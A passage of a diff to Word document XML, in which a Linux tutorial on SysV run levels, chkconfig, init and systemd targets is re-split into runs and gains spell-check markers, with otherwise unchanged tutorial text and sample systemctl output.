-      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
+        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/etc/rc.d/rc5.d</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
+        <w:t>run level</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>.  There is a</w:t>
+        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>n</w:t>
+        <w:t>run level</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /etc/rc5.d, but it is just a symlink that points to </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> 5) </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>/etc/rc.d/rc5.d.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>To ease the burden of keeping track of the symlinks in the rc.d directories</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.  There is a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -761,33 +1163,55 @@
       <w:r>
         <w:t xml:space="preserve">called </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  In addition to maintaining the rc.d directories</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>, chkconfig</w:t>
-      </w:r>
+        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -843,21 +1267,25 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> or </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>telinit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>,</w:t>
       </w:r>
@@ -891,12 +1319,14 @@
       <w:r>
         <w:t xml:space="preserve"> would be </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -921,11 +1351,19 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init 2</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (console only).  </w:t>
@@ -945,12 +1383,14 @@
         </w:rPr>
         <w:t xml:space="preserve">udo </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -977,11 +1417,19 @@
       <w:r>
         <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">init </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1056,11 +1504,19 @@
       <w:r>
         <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>cntl-alt</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cntl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-alt</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
@@ -1116,7 +1572,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>use sudo init 5</w:t>
+        <w:t xml:space="preserve">use sudo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> to get back to the desktop.</w:t>
@@ -1166,7 +1636,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The VM steals your mouse because VMware Tools (open-vm tools, really) are not running in console mode.</w:t>
+        <w:t>The VM steals your mouse because VMware Tools (open-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> tools, really) are not running in console mode.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1181,12 +1659,21 @@
       <w:r>
         <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>chkconfig --list</w:t>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> from SysV is</w:t>
@@ -1667,7 +2154,43 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>[john@john ~]$ systemctl list-units --type target</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>john@john</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>~]$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> systemctl list-units --type target</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1697,13 +2220,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>basic.target           loaded active active Basic System</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>basic.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Basic System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1715,13 +2268,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>cryptsetup.target      loaded active active Encrypted Volumes</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>cryptsetup.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Encrypted Volumes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1733,13 +2316,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>getty.target           loaded active active Login Prompts</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>getty.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Login Prompts</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1751,13 +2364,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>graphical.target       loaded active active Graphical Interface</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Graphical Interface</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1775,7 +2418,27 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">local-fs-pre.target    </w:t>
+        <w:t>local-fs-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pre.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1791,7 +2454,25 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> active active Local File Systems (Pre)</w:t>
+        <w:t xml:space="preserve"> active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Local File Systems (Pre)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1809,7 +2490,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>local-fs.target        loaded active active Local File Systems</w:t>
+        <w:t>local-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fs.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Local File Systems</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1827,7 +2546,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>multi-user.target      loaded active active Multi-User System</w:t>
+        <w:t>multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Multi-User System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1845,7 +2602,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>network-online.target  loaded active active Network is Online</w:t>
+        <w:t>network-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>online.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Network is Online</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1868,7 +2663,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In this case, both multi-user.target and graphical.target are active, so we must be in run level 5.</w:t>
+        <w:t>In this case, both multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are active, so we must be in run level 5.</w:t>
       </w:r>
